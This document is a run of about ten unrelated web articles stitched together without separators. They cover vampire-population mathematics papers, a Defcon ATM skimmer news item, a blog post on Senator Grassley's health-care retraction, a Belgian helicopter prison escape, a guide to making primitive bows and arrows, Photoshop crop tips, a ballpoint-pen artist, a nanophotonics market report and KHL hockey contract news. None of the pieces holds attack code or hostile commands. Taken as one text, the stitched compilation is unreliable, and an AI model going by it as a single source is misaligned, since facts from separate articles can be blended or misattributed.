If vampires are indeed living ( unliving ? ) among us , then should n't we have seen an undead population explosion by now ?
Advertisement
Fortunately , our best minds are on the case .
Physicists Costas Efthimiou and Sohang Gandhi's paper " Cinema Fiction vs. Physics Reality " offers a full explanation .
Efthimiou and Gandhi conduct a thought experiment : Assume that the first vampire appeared on January 1 , 1600 .
At that time , according to data available at the U.S. Census website , the global population was 536,870,911 .
Efthimiou and Gandhi calculate that , once the Nosferatu feeding frenzy began , the entire human race would have been wiped out by June 1602 ( thus forever changing the course of history by preventing the invention of the slide rule eighteen years later ) .
The physicists note :
Another philosophical principal related to our argument is the truism given the elaborate title , the anthropic principle .
This states that if something is necessary for human existence , then it must be true since we do exist .
In the present case , the nonexistence of vampires is necessary for human existence .
Apparently , whomever devised the vampire legend had failed his college algebra and philosophy courses .
Advertisement
Oooh , snap !
But , this gauntlet had been barely thrown down before it invited a rebuttal from mathematician Dino Sejdinovic .
In his article , " Mathematics of the Human Vampire Conflict " ( Math Horizons , November 2008 ) Sejdinovic faults Efthimiou and Gandhi 's logic , since they have not " accounted for the birth - rate of non-vampires and death - rate of vampires ( actually the death - death - rate since they are already dead , but when they die again they should stay dead but stop being living ) due to close encounters with stakes , garlic and holy water . "
Moreover , " vampires are presented exclusively as greedy consumers : a rational strategy of managing their human resources is not considered . "
Here , Sejdinovic cites the pioneering research conducted by Austrian mathematicians Richard Hartl and Alexander Mehlmann , who published the landmark 1982 paper , " The Transylvanian Problem of Renewable Resources , " later followed up by " Cycles of Fear : Periodic Bloodsucking Rates for Vampires " ( Journal of Optimization Theory and Application , December 1992 ) .
Hartl and Mehlmann argue that vampires would never be stupid enough to deplete their entire food supply , and by applying the Hopf - Bifurcation Theorem ( do n't ask ) , they demonstrate how vampires can adopt an optimal " cyclical bloodsucking strategy . "
Advertisement
However , there is a serious flaw in the Hartl and Mehlmann model :
The assumption that human beings would be docile prey .
Their research provoked an outraged response from economist Dennis Snower , who in his article " Macroeconomic Policy and the Optimal Destruction of Vampires " ( The Journal of Political Economy , June 1982 ) , declared :
One wonders what conceivable interest the authors could have had in helping vampires solve their intertemporal consumption problem .
The implicit assumption of the Invisible Hand ( or Fang ) - whereby vampires , in pursuing their own interests , pursue those of human beings as well - is of questionable validity .
The study by Hartl and Mehlmann is not concerned with the macroeconomic implications of blood - sucking behavior modes .
Nor does it consider the policy instruments whereby human beings can protect themselves from vampires .
Instead , humans are modeled as passive receptacles of blood whose cultivation and harvest are left to vampire discretion .
Advertisement
Hooyah !
Snower argues that the mortal world can manage its resources in a manner that keeps the undead population in check , while simultaneously promoting long - term economic growth :
A transfer of labor services from the widget sector to the stake sector reduces human welfare at present but may raise welfare in the future ( since an increase in stake production reduces the vampire population and thereby increases the future labor force whereby future widgets may be produced ) .
Advertisement
Still , I 'm not entirely confident in Snower 's conclusions - not least because his complex mathematical proof indicates that the complete destruction of vampires would not be " socially optimal . "
( And you wonder why economics is known as the dismal science ? )
In fact , all of these models rest upon the assumption that vampires are at the top of the undead food chain .
Who says that the blood - sucking population is not kept in check by something that preys on vampires ?
Time to consult the zoology journals .
Advertisement
Mark Strauss is a senior editor at Smithsonian magazine .
Criminals running an ATM card - skimming scam made a big mistake this week :
They tried to hit the Defcon hacker conference in Las Vegas .
As the conference was kicking off a few days ago , attendees noticed that an ATM placed in the Riviera Hotel , which plays host to the annual event , did n’t quite look right , according to a senior conference organizer who identified himself only as Priest .
“ They looked at the screen where there would normally be a camera , ” he said .
“ It was a little bit too dark , so someone shined a flashlight in there and there was a PC . ”
The ATM looked like a working system , but when people would put their cards in the machine , it would scan their card information and record the PIN numbers they entered .
He did n’t know how long the ATM had been at the Riviera .
Conference organizers notified local law enforcement who hauled away the machine on “ Thursday or Friday , ” said Priest , who said he works as a “ civil servant ” in his day job …
The criminals probably did n’t realize that they were installing their ATM in a hotel that was soon going to be flooded with more than 8,000 security professionals , he added .
They were smart enough to place the machine in one of the few spots in the hotel where there was no security camera to catch them , Priest said .
“ It was literally right next to the hotel security entrance . ”
Could n’t be a safer place .
Hotel security is too busy protecting the gambling operation to worry about someone else stealing .
If you somehow missed Grassley 's remarks ( say , if you had taken a trip to Mars last week , or were in a coma and so did n't turn on the tv ) , check out the link above or click here for CBS 's take on it - CBS did fact check the claims - or here for the Fox News article , which you 'll notice made no effort to provide an accurate rebuttal to Grassley 's claims ( yeah , I know , big surprise ) .
Predictably , Grassley 's comments were all over the news .
News junkies like me saw the comments repeated ad nauseum for a couple of days .
Any sane person clearly realizes that the claims are entirely bogus , but although there were some news outlets that tried to fact check the claims , as CBS did , the damage was done .
In the House , the sponsor of the amendment , which actually concerned only a plan to pay doctors , on a purely voluntary basis , when they provide end - of - life counseling , was forced to withdraw it , lest the astroturfed outrage over the issue ( or , to be more accurate , non-issue ) , fed in no small part by the non -stop press coverage of Grassley 's remarks , provide too large a distraction from the real issues of health care reform .
That 's bad enough .
But this morning Greg Sargent , at the Plumline , made a very interesting observation .
The press had been all over Grassley 's " pull the plug on Grandma " comments , but had completely overlooked the news that Grassley has now retracted the statements .
From Sargent 's article :
This passed unnoticed , but it ’s a big deal :
Over the weekend , and very quietly , Senator Chuck Grassley completely retracted his widely - reported claim last week that people have " every reason to fear " that the House health care proposal would create a " government program that determines if you ’re going to pull the plug on grandma . "
The retraction was buried deep in this Washington Post article on Grassley ’s role , with a spokesperson admitting Grassley does n’t really believe what he said about " grandma " : Grassley says he opposes that counseling as written in the House version of the bill , but a spokesman said the senator does not think the House provision would in fact give the government such authority in deciding when and how people die .
The House bill allows patients to decide for themselves if they would like such counseling .
Let ’s be clear :
By clarifying that Grassley does n’t think the House bill would " give the government such authority in deciding when and how people die , " his spokesperson completely repudiated his widely discussed claim .
This goes much farther than Grassley did in a statement released Friday clarifying he ’d never used the words " death panel " and was merely worried about " unintended consequences . "
All of this is even worse than it seems at first glance , because Sen .
Grassley is part of the six - Senator ( 3 Dems / 3 Republicans ) group that Sen.
Baucus has assembled from the larger Senate Finance Committee , to work out the Senate bill .
And yet he 's helping to disseminate information to the public to essentially torpedo reform !
What I want to know is :
Why should someone so irresponsible as Chuck Grassley essentially hold the fate of health care reform in his hands ?
AND , Where Is the Press ????
It 's Greg Sargent who deserves the credit for finding this ( Thanks , Greg ! ) , and I do n't generally ask for recs , but this time , I 'm asking .
Not for me , but in the hopes that Grassley 's retraction will get noticed and receive the attention it deserves in the news .
UPDATE : Make sure to check out BarbinMD 's excellent front page story on Grassley 's recent antics too .
She references Sargent 's article , so I just wanted to say that I had started to write this diary before I saw her article ( I 've been trying to get the Sargent article noticed over at reddit all day ) .
( CNN ) --
Three prisoners -- including one considered to be among Belgium 's most dangerous criminals -- have broken out of a prison near Bruges in a daring helicopter escape .
Mohammed Johry , Abdel Had Kahjary Mulloul and Ashraf Sekkaki escaped a Belgium prison .
Thursday 's jailbreak prompted Interpol to issue an international alert to police around the world to be on the lookout for the men .
Accomplices of the three inmates hijacked a helicopter and forced the pilot to land in the prison courtyard , Interpol said .
The fugitives are Mohammed Johry , Abdel Had Kahjary Mulloul and Ashraf Sekkaki .
Sekkaki is considered one of Belgium 's most dangerous criminals , Interpol said , with more than 16 convictions for violence , including bank robbery and kidnapping .
A 22 - year - old man of Moroccan origin was an accomplice to the group but had to stay behind because the helicopter could n't carry everyone , the Belga news agency reported .
Jailbreaks by helicopter are becoming " far too common " worldwide , Interpol Secretary - General Ronald Noble said .
That highlights the need for countries to report the identity of escapees as quickly as possible , he said .
" It is vital that police have the information they need to locate , identify and arrest these fugitives , " he said .
Belga identified the helicopter pilot as Ludwig Louwagie and said he was unhurt .
" It was just like in a film , " Louwagie told the news agency .
He said a couple had booked a sightseeing tour of the Bruges region Thursday afternoon .
While in flight , the man suddenly pressed a weapon against his temple , Louwagie told Belga .
The man took away his headset so the pilot could n't talk to ground control and forced Louwagie to land in the prison courtyard , he said .
" I tried to land next to the prison , but the weapon was still pressed hard against my temple , " he said .
" I had no choice . "
Simple , Cheap and Effective
Bows and Arrows
by Stephen Coote
Some wonderful factory - made archery gear is available today .
It is efficient and capable of great accuracy .
But to enjoy archery , or to get meat for the table , it is not essential to have the very latest commercial equipment .
Making your own gear is a good option .
Our ancestors made bows and arrows for thousands of years with very basic tools and materials , and we can do the same today .
Just because a bow is primitively produced , it does not mean it will be no good .
Simple bows and arrows crafted from natural materials can still regularly hit the bullseye or help you bring home the bacon .
There are many different types of bow and arrows , but here are some ideas for producing a bow and arrows as quickly and as cheaply as possible .
THE BUNDLE BOW
This bow is made from several , reasonably straight sticks ( or similar objects ) of fairly uniform thickness that are bound together into a bundle .
A single , plain stick with a string tied to it will make a bow of sorts , but it may be likely to bend too much in the middle and be inefficient .
An efficient bow carved from a single piece of wood will generally be quite tapered towards both ends to balance the leverage applied by the string so that the bow bends evenly throughout both limbs .
A bundle bow is generally made up of sticks that are tied together in such a way to achieve a similar taper .
Three sticks of a similar diameter ( and a fairly uniform thickness for their whole length ) can make a good bow .
The shortest stick should be around half the length of the longest one .
The middle - sized stick should be about three - quarters the length of the longest one .
Small saplings can be cut and seasoned to make a bundle bow , but a suitable variety of seasoned bamboo may perform a little better because of its comparatively low weight .
Some varieties of bamboo seem to be quite unsuitable for this purpose .
Old fibreglass fishing rods might be something to consider .
The thicker the sticks , the harder it will be to draw the bow .
If you are going to use solid sticks , and you can't find ones that are the right diameter , you could try thinning them down or tapering them .
Your first bow might not be a wonderful performer , but you are likely to learn something from making it .
When choosing bow - making materials , or thinking about a good design for a bow , it is good to try to keep the outer ends of the limbs as light as is practically possible .
This does not mean that you should choose the lightest possible wood to make a bow ... some of the most " recommended " bow woods are relatively dense and heavy , and light woods are generally not recommended for bow making .
If you only have light wood available , then perhaps you should experiment with it .
You may be surprised at what is possible .
It is often recommended that a bow should be longer than twice your draw length ( the greatest distance between the back of the bow and the bow string when the bow is fully drawn ) .
Twice your draw length plus 20 % might be a good guide to start with .
A shorter bow may shoot a little faster and be more convenient to carry than a longer bow , but it may be more likely to fail .
A longer bow may help you shoot more accurately and will probably be a
bit more durable .
It is good to experiment .
For a start , you might like to make your bow nearly as tall as yourself - up to your forehead perhaps .
Freshly cut wood and bamboo should dry ( season ) quicker indoors .
Thin sticks and roughed - out bow staves may be dry enough to turn into a bow within two or three weeks if the drying conditions are good .
Fresh , green wood will make a bow of sorts , but it is unlikely to be as efficient as a seasoned bow , and it may " follow the string " ( stay bent when you unstring it ) more than a seasoned bow .
The diagrams accompanying this article are , hopefully , fairly self - explanatory .
Plenty of strong , tight bindings should be applied to stop the sticks slipping .
Strong adhesive tape may be a suitable alternative in some cases .
The sticks will be more securely held together if the smallest stick is tied ( at least at each end ) to the longest stick first .
Then the next longest stick should be tied in place and so on .
If all the sticks are simply picked up as a bundle and the only binding to be applied goes around the outside of the bundle , some of the smaller sticks may move when the bow is flexed .
On many traditional bows carved from one stick , nocks are cut near the tips of each limb to hold the bow string .
Instead of using cut nocks , the bow string can be stopped from slipping down the bow by applying a tight wrapping of cord or leather strapping around the end of the limb .
This " lump " of cord may be more secure if it is glued into place ( see diagram ) .
THE BOW STRING
It is said that a bow string should have a breaking strain of four or five times the draw weight of your bow , and that it should n't stretch too much ( this reduces the efficiency of the bow ) .
All sorts of fibre can be used to make a bow string .
The making of a traditional string or a natural fibre string are good skills to learn but they are beyond the scope of this small article .
However you can just use a single piece of cord as a bow string .
Many of my own strings are made up of three lengths of polyester butchers twine .
I plait an eye into one end and twist the strands loosely to form the main part of the string .
It is not essential to have a special plaited or braided loop ( or eye ) to fasten your string to your bow .
One end can be tied with a timber hitch knot , and the other end can have a loop formed by a knot .
To form the loop I do not recommend a bowline - I think this may weaken the string too much for a powerful bow .
I prefer a figure - eight loop
The string should be just long enough to create the right gap between the string and the bow when the bow is strung .
Some people use a gap of one " fistmele " .
A fistmele is the distance between the top of your thumb and the bottom of your fist when you give a " thumbs up " sign .
STRINGING THE BOW
I prefer to string my bows this way ....
I slip the loop over the top limb and let it slide down the limb below the nock .
The other end of the string is fastened to the other nock .
The handle of the bow is held firmly in my left hand with the belly facing away from me .
The tip of the lower nock is jammed against the instep of my left foot .
I push the upper limb of the bow with my right hand while pulling the handle toward me .
My right hand also grips the upper
loop of the string .
As the bow bends I slide the top loop of the string upwards and place it in the nock .
I do n't pull the bow directly towards me ; I pull it slightly sideways so that if something slips or breaks it is less likely to strike me in the face .
I also turn my head to my left to protect my eyes and this means that I have to slide the string into place by " feel " rather than looking at what I am doing .
This method of stringing works best with notched or post nocks - wrapped nocks do n't allow the loop to slide up the limb easily .
If your bow is relatively strong and / or your nock and string loop are not suited to this method of stringing the bow , then you may have to use another method .
Sometimes I have strung a bow by placing the lower limb tip across my left foot with the belly facing upward .
I then step over the bow with my right leg .
I hold the upper limb with my right hand and lift the bow as high as necessary to get the belly side of the handle behind my right thigh .
I use my left hand to put the string in place while I bend the bow with my right hand .
( The string will already be fastened to
the lower nock and should pass in front of your right leg ) .
When the bow is strung correctly you will find that your right leg is between the stave and the string .
Care has to be taken not to over - bend any part of the bow during this process .
Sometimes a particularly long or heavy bow can be strung by placing the lower limb on the ground with the belly facing upward .
The right hand grips the upper limb just below the upper nock .
The upper nock may be about half a metre off the ground at this stage .
The left knee is then placed on the handle area and the weight of the body is brought down on the handle .
The string is already fastened to the lower nock , and when the bow is bent enough the string is fixed to the upper nock .
It is best to unstring the bow when it is not in use .
OTHER BOWS
Excellent bows can be carved from a single stave of wood , or they can be laminated .
If you are making a laminated bow , the layer on the back ( the side furthest from the archer ) should be strong in tension .
The belly side ( facing the archer ) should be strong in compression .
Instruction for making these bows is beyond the scope of this small article , but the process is reasonably straightforward and there is plenty of information available in books and on the internet .
Most primitive bows would have been carved from one solid stave of wood .
ARROWS
Arrows can be made from purchased dowelling , or purpose - made arrow shafting .
Alternatively , you can cut , or split , suitably - sized lengths of straight - grained timber and then make these round with a plane and sandpaper ( or something similar ) .
If you are using any of these options , you have to make sure that the shafts have a nice straight grain running parallel with the shaft .
If the grain runs at too much of an angle to the shaft , the arrow is likely to break at this point .
It is a nuisance to have an arrow break when it hits the target , and it is even worse if the arrow breaks while you are shooting it and a sharp part of it penetrates your arm or hand .
You can test shafts to some extent by bending them with quite a degree of force .
It is better to break them before you fix the fletchings and the points .
You may have to straighten the surviving shafts by applying gentle hand pressure .
Many arrows have been made from natural shoots .
These generally have to be dried , straightened and trimmed to the right diameter before an arrow can be made from them .
Many species of plant will grow shoots that can be turned into arrows , but some may have better qualities than others .
Finding strong shoots of the right weight that do n't have a tendency to constantly bend may be a challenge .
Some shoots may split more if you peel them before you dry them , but peeling may speed the process .
Some folks place a lot of importance on having the correct " spine " or stiffness in an arrow .
After shooting many arrows I feel that spine may not be as critical as some folks believe .
Perhaps my style of shooting compensates for differences in spine .
Perhaps my shooting is not consistent enough for me to notice the difference anyway .
Anyhow , rather than getting too concerned about spine , the beginner may as well just make some arrows from shafts that seem to have the right " stiffness " and see how they shoot .
My current thinking is that longer arrows are generally better when it comes to accuracy and hitting power , so I would suggest that you make them at least a couple of inches longer than your draw length .
It is a good idea to hand - straighten the shoots as they dry .
Sometimes dry shafts will straighten more readily if the bent area is rubbed with fat and then heated above a candle flame immediately prior to straightening ( do n't scorch the arrow ) .
If using heat , it is a good idea to hold the arrow in the straightened position ( or a little past it ) for a short time while the wood cools down .
An arrow straightening tool can be useful if the bend is tight or right at one end of the shaft .
This tool might consist of a suitably - shaped piece of wood at least three - quarters of an inch thick with a hole drilled through it near one end .
The hole is passed over the shaft , and the wood is levered to straighten the arrow .
Nocks can be cut into the arrow using hacksaw blades that have been taped together to create a slot that is just the right width .
This slot can be smoothed with sandpaper or a thin file .
All sorts of nocks sizes will work , but a nock that just lightly grips the string is what I prefer .
The nock should be deeper than the thickness of the string .
Nocks can also be filed or even carefully whittled with a thin blade .
It is a good idea to make a small binding of fine cord in front of the nock if there is a possibility that the shaft might split .
Arrowheads are a big topic on their own .
I have hunted using simple broadheads that have been cut from sheet metal that is about 1.6 mm thick .
These are glued and bound into a slot at the business end of the shaft .
More elaborate broadheads can be made by soldering a blade into some suitably - sized tubing .
I have used cartridge cases and steel tubing for this purpose .
Broadheads should always be very sharp when hunting .
Fletchings have been made from feathers for a long time .
The three - feather fletch is the most common configuration , but some folks use a four or two - feather fletch .
Commercially made plastic vanes are another option .
I prefer to use feathers , but I have had very good results using fletching made from adhesive tape .
This might not seem primitive in a pure sense , but it is a great option to get your arrows flying if good feathers are n't easy to get .
Some tapes are more suitable than others .
The correct " stiffness " is hard to describe , it should n't be too flimsy or too stiff , but remember that the fletch should be able to bend out of the way as it comes in contact with your hand or the bow .
I have had success with tape made for repairing rips in plastic hay bale covers .
I have also got reasonable performance from two or three other types that I have tried .
Tape that comes on rolls about 48 millimetres wide is convenient to use .
Cut three bits of tape about 150 millimetres ( about six inches ) long .
Pick up one piece and bend it lengthwise to form a " U " with the sticky side outwards .
The base of this " U " is stuck lengthwise along the shaft .
Now pick up the second piece and bend it like the first one .
This one will be stuck in position a third of the way around the shaft from the first one , while the first bit of tape is still bent in the " U " position to keep it out of the way .
Things can get a bit tricky here because the two bits of tape can stick to each other before you are ready .
If you feel that the two bits of tape are sitting in the right position , you can allow the two adjacent wings of tape to stick to each other , thus forming the first complete vane .
Mould the tape against the shaft to get it to stick well .
The two bits of tape will sometimes stick without being exactly in the right position thus skewing the vane or making it lumpy .
Now the third piece of tape is applied in a similar manner .
A big challenge with this tape fletching is to get three nice , flat , evenly spaced vanes .
This should come with practice .
Another challenge is to end up with the vanes where you want them in relation to your nock so that you get the conventional " cock and hen feather " configuration with the cock feather at right angles to the plane of the nock .
If your fletching job is n't very neat , you may find that the arrow will still fly fairly well .
Once you have the tape firmly pressed into place , you can trim the vanes with sharp scissors .
I have found it necessary to have the vanes tapering down to nothing at the leading end so that they ride nicely past the bow and my bow hand .
Keep the vanes as narrow as possible .
Make the taper as long as possible .
I apply a tight wrap of soft insulation tape over the very front end of these plastic vanes to stop them catching and pulling away .
If you want a more primitive alternative to feathers you could try binding tufts of fibre to your arrows .
I have had reasonable success with this method on long arrows .
If you do n't have an arrow rest on your bow and just shoot " off your hand " , then you have to be careful that the fibre is tidily bound so there are n't any big lumps or spikes to damage your bow hand as the arrow flies past .
E-mail your comments to " Stephen Coote " at srcoote@gmail.com .
A Post By : Helen Bradley
If you ’re used to clicking the crop tool dragging the tool over your image and pressing Enter , it may surprise you to know that there are other options that you can use when cropping in Photoshop .
Here are my five “ best - kept secrets ” of the Photoshop crop tool .
1. Rotate as you Crop
When you drag the crop marquee over an image , you can rotate it by letting go the mouse button and drag on one of the corners of the marquee to rotate it .
When you double click you will rotate and crop the image at the one time .
2. Perspective Crop
You can fix perspective at the same time as cropping by first dragging a crop marquee over the image .
Let go the mouse button and click the Perspective checkbox on the toolbar .
Now when you drag on a corner of the marquee the corners move independently of each other allowing you to position the marquee along the lines you want to crop to in the image .
When you crop the image it is cropped and distorted to create a rectangular image .
You can use this to fix distorted perspective in your images .
3 . The Crop that ’s not a Crop
Once you have selected an area to crop , you do not actually have to crop it , and you can , instead , simply hide the cropped area rather than permanently deleting it .
To do this , you need to be working on an image layer and not the background layer so double - click the background layer and convert it to a regular layer .
Drag a crop rectangle over the image and from the tool options bar , select the Hide option .
When you double click the cropped area will be hidden but still accessible .
You can now select the Move tool and reposition the image inside the area that you have cropped it to .
This is useful when you want to crop an image to 4 x 6 in size and you want to experiment with different ways to compose the image within this area .
4 Create and Use Crop Presets
When you click the Crop tool you can choose from various presets by clicking the dropdown list to the immediate right of the tool in the tool options bar .
Click a preset and drag on the image to create the crop marquee .
You can turn a portrait crop to a landscape one ( or vice versa ) by selecting the preset , drag over the image and then rotate the marquee ninety degrees by holding the Shift key as you do so to constrain the rotation to multiples of 15 degrees .
To create your own preset , set the width , height and resolution in the tool options bar and then click the fly - out menu for the crop tool and select New Tool Preset .
Give your preset a name and click Ok .
It will appear at the foot of the presets list and you can select and use it anytime in the future .
5 Crop to the Same Size
To crop two images to the same size , select the Crop tool and make active the image you want to match the size of .
Click the Front Image button on the tool options bar to configure the Crop tool with the dimensions of the front image .
Select the image you want to crop and drag a crop rectangle over that image .
When you double - click to finish , the image will be cropped to the same size and resolution as the original image – in some situations this may mean that the image will have increased in size .
Warning :
If the Crop tool is n’t working as expected , press Esc to exit the tool and click the Clear button to reset it – some settings are sticky and you may not remember you had set it to special crop settings earlier in an editing session .
Next time you go to crop an image , remember that there are more options for the crop tool than may initially meet the eye .
Get more tutorials like this by subscribing to our free newsletter or following us on Twitter .
Last updated at 13:08 02 February 2008
They may look like pin-sharp photographs - but these amazing pictures are actually drawings created with the humble ballpoint pen .
The stunning pictures , measuring up to 10 ft high , were drawn by a rising star of the art world , Juan Francisco Casas .
Casas , 31 , can use up to four 14 p ballpoint pens for a canvas and his works are already a sell - out at exhibitions .
Formerly a traditional painter , Juan began the drawings three years ago based on photographs of nights out with his friends .
Scroll down for more ...
Speaking from Rome yesterday , he said he admires the " simplicity " of the ballpoint pen , invented in 1938 by Hungarian Laszlo Biro .
Casas said : " I guess it started off as a joke , to try and make something so realistic that people would think is a photo .
" I also wanted to create it with something that everyone has - a Biro .
I do n't think it has ever been done before .
" For me it 's not that different from painting .
I was trying to show that it does n't matter what material you use , it 's what you do with it . "
Casas only uses blue Bics and can get through several to make one drawing .
He has just spent two weeks drawing his largest piece , which is 10 ft high by 3ft wide .
The only drawback is that he can't erase any errors .
He said : " Mistakes are the main problem .
It 's better if I make them at the beginning . "
Scroll down for more ...
Casas studied Fine Art at the University of Granada , in southern Spain , and then worked there as a teacher for six years .
He submitted a ballpoint - pen drawing to a national art competition in Spain in 2004 - and was shocked to be awarded the second prize .
He said : " It 's a very serious , and academic sort of competition , and I knew they would think my entry was a joke .
It was just on a normal piece of paper in biro .
" I had previously done painting - oil on canvas - and this was something new .
But they liked it , and it went from there . "
Scroll down for more ...
He has exhibited in Chicago and in his native Spain , and is preparing an exhibition in Rome where he now lives .
At an exhibition in Madrid last week he sold 60 works for between 1,000 and 5,000 euros apiece ( £ 750 to £ 3,750 ) .
He said : " It was a real shock that it was so successful .
I would love to come to England , but at the moment I have n't got a lot of work , as I 've sold everything . "
A British firm took over the ballpoint pen patent to make them for the RAF shortly after their invention , and the first ones went on sale in the UK in 1946 .
The Bic pen , a variation on Biro 's original design , went on sale in France in 1950 .
Nanotechnology , optoelectronics , and photonics are expected to make a significant impact on the way we see the world today .
Nanophotonics is the combination of these three technologies .
The nanophotonics components market is expected to reach over $ 3.6 billion by 2014 , while the nanophotonics device market is expected to grow at a CAGR of more than 100 % from its current market size of $ 1.8 billion to $ 58 billion in 2014 .
This report�s detailed analysis not only offers market statistics , but also gives stakeholders a clear picture of the market trends , along with the major factors driving market growth .
Nanophotonics is making inroads to the existing and growing markets of light emitting diodes ( LEDs ) , organic light emitting diodes ( OLEDs ) , near field optics ( NFO ) , and photovoltaic ( PV ) cells .
This is encouraging new players to invest in this market .
Even a small increase in penetration would translate into a significant growth in actual sales , as the overall markets are growing at a rapid pace .
The stakeholders would also benefit from the report�s strategic analysis , which is based on a detailed study of the market and exchange of market knowledge with industry experts .
Our analysis would provide nanophotonics companies and commercial research labs an in - depth understanding of the upcoming trends and opportunities in the market ; and also a detailed analysis of the submarkets .
Scope of the report
This report highlights the basic structure of the nanophotonics market and its various sub-segments , such as LEDs , OLEDs , NFOs , optical switches , optical amplifiers , and holographic memory device .
These individual markets are further broken down into their respective sub-segments based on products , ingredients , and applications .
Market trends and forecasts are identified for each sub-segment , supported by the drivers and inhibitors for the respective markets .
The report features more than 100 market tables and over 50 company profiles to provide a deeper understanding and insight into the market and the competitive landscape .
The report sizes all the micro markets in the four major markets of North America , Europe , Asia , and Rest of the World ( ROW ) .
All the market tables are categorized as per geography , ingredients , applications , and products .
In addition to the market data , trends , and forecasts , the report will also highlight the key opportunity areas for the relevant stakeholders , identifying the measures that could help players increase their market shares .
Recent technical as well business developments related to the nanophotonics market and its sub-segments will also find ample space in the report .
What makes our reports unique ?
We provide the longest market segmentation chain in the industry with our three - level market breakdown and our analysis of minimum 40 collectively exhaustive and mutually exclusive micro markets .
We provide 10 % customization to ensure that our clients find the specific market intelligence they need .
Each report is about 150 pages , featuring 30 + market data tables , 30 + company profiles , and an analysis of 200 patents .
15 pages of high level analysis identifying opportunities , best practices , entry strategies , benchmarking strategies , market positioning , product positioning , and competitive positioning .
Key questions answered
Which are the high - growth segments and how is the market segmented in terms of applications , products , services , ingredients , technologies , stakeholders ?
What are market estimates and forecasts ; which markets are doing well and which are not ?
Where are the gaps and opportunities ; what factors are driving market growth ?
Which are the key playing fields and winning - edge imperatives ?
What is the competitive landscape ; who are the main players in each segment ; what are their strategic directives , operational strengths , key selling products , and product pipelines ?
Who is doing what ?
Powerful Research and analysis
The analysts working with MarketsandMarkets come from renowned publishing and market research firms globally , adding their expertise and domain understanding .
We get the facts from over 22,000 news and information sources , a huge database of key industry participants and draw on our relationships with more than 900 market research companies .
Nanophotonics to Revolutionize the Market
Nanophotonics is born out of the combination of three major sciences : photonics , nanotechnology , and optoelectronics .
While photonics and optoelectronics have revolutionized the electronics and semiconductors market , nanotechnology has the greatest potential for further improvement , and hence emerged as the most sought - after technology by big companies and research laboratories .
In spite of it being at the nascent stage , nanophotonics is expected to make it to the mainstream market owing to its higher power efficiency , thermal resistivity , and operational life .
The nanophotonics component market is growing at a robust rate for the last few years and expected to maintain a very high CAGR for the next few years .
The market is expected to reach $ 3.6 billion in 2014 at a CAGR of 100.7 % from 2009 to 2014 and a similar growth pattern can be expected for the nanophotonics devices market as well .
This market is expected to grow from a current market size of $ 1.8 billion to $ 58 billion in 2014 .
Though most of the nanophotonics products are still under research , the available products such as nanophotonics LEDs , nanophotonics PV cells , nanophotonics OLEDs have been very successful in the market .
Nanophotonics LEDs have the largest market share of $ 106 million in 2009 .
However , considering the pace of progress in various other segments like near - field - optics , optical amplifiers , optical switches and holographic memory , it can be safely ascertained that holographic memory and optical switches are expected to have the highest growth rate in the next five years .
Nanophotonic LEDs will still continue to be largest segment albeit at a slow growth rate .
In the nanophotonics LED market , the high beam LED has the highest market share , followed by UV LED .
In the fastest growing market of optical amplifiers , it is the optical fiber amplifier that commands the highest CAGR in the period 2009 to 2014 , followed by semiconductor amplifiers .
HDSS is also expected to grow at a CAGR comparable to that of optical amplifiers .
OLED is estimated to be the slowest growing market .
Lowering production costs and improving operational efficiencies would ensure opening of new opportunities for the nanophotonics market .
The market is concentrated with only the market leaders like Osram , IBM , Samsung SDI , JDSU , etc. doing extensive research in nanophotonics , but as most of the application areas are related to electronics , this market is expected to attract a large number of players , which would , in turn , increase the degree of competition .
The key players in the nanophotonics component market are working at developing new products by forging strategic alliances with renowned universities , research laboratories , and nanomaterial companies .
These developments are focused on improving the operational parameters for the nanophotonic devices and grab the early mover�s advantages in the market .
Our patent analysis indicates that the U.S. has filed the highest number of patent applications in nanophotonics since 2006 , followed by Europe .
In the products category , nanophotonic LED accounts for the highest number of patents , followed by nanostructures while OLED accounts for the lowest .
A 17 - year - old Russian touted as the possible No. 1 overall pick in the 2010 N.H.L. entry draft faces almost certain suspension by the K.H.L. after he refused to sign a contract that contained no clause allowing him to depart for North America .
The player , Kirill Kabanov , was singled out for discipline by K.H.L. president Alexander Medvedev during a Tuesday news conference in Moscow , the latest episode in an ongoing series of K.H.L. - N.H.L. disputes over player contracts .
The request for suspension came from regular - season champions Salavat Yulaev Ufa , to whom Kabanov has not reported after he was traded from Spartak Moscow earlier this summer .
Kabanov ’s father and agent , Sergei Kabanov , explained to the Russian television channel Vesti Sport last week that the forward would not report to Salavat unless the club offers him a “ normal contract . ”
The elder Kabanov said , “ Our condition remains the same : a free departure for Kirill to the N.H.L. without any compensation . ”
Starting this season , standard K.H.L. contracts contain clauses tying players to clubs until they reach 28 .
A player under that age can leave his club , but only after arranging for the club to be paid “ compensation , ” a mutually agreed - upon figure that would amount to a transfer fee .
“ The disciplinary committee will consider the case , ” Medvedev said of Kabanov , who is currently listed by The Hockey News as the No. 2 prospect in next year ’s draft .
“ I do not want to anticipate their decision , but from the circumstances that are familiar to me , no choice remains beyond Kabanov being disqualified for an unprecedented violation of league rules . ”
Medvedev said that K.H.L. contracts contain no provision for players leaving for leagues outside the country .
“ There are no insurmountable barriers to playing hockey in the N.H.L. or any other league , ” he said , “ but certain conditions must be met — in this case , the payment of compensation . ”
Medvedev criticized the N.H.L. for its “ double standard ” with regard to Russian contracts .
He cited recent disputes involving defenseman Bryce Lampman , who signed with St. Louis last month even though the K.H.L. maintains that Lampman still has a valid contract with Amur Khabarovsk ; Sergei Shirokov , who earned a two - year K.H.L. suspension by leaving CSKA Moscow to sign with Vancouver earlier this month ; and Denis Parshin , who ultimately re-signed with CSKA rather than jump to Colorado .
“ We are stressing to the N.H.L. that lawlessness is not in their interest , ” Medvedev said in discussing Kabanov and the other contract disputes .
“ And we we will not succumb to their provocations . ”
The Moncton Wildcats of the Quebec major junior league were hoping that Kabanov would join them this season .
“ It ’s a work in progress , ” Wildcats coach Danny Flynn told The Moncton Times and Transcript last week .
“ The boy very much wants to come to Moncton and the Canadian Hockey League and we ’re quietly working hard to make that happen . ”
Last year as a 16 - year - old , Kabanov played six regular - season and four playoff games for Spartak , registering no points .
However , in seven games for Russia at the I.I.H.F. U18 World Championship , he went 4+7=11 with a plus - 5 mark and 18 PiM .
Earlier this month at the Ivan Hlinka Memorial Tournament for U18 players in the Czech and Slovak Republics , Kabanov scored a hat trick against the U.S. in the opener but was not a factor in the 9 - 2 loss in the gold medal game after being leveled by Canada defenseman Brock Beukeboom .
Salavat ’s new coach is Vyacheslav Bykov , who also coaches the Russian national team .
Just yesterday , the MINI Coupe Concept was unveiled as a preview to its Frankfurt Motor Show official debut next month .
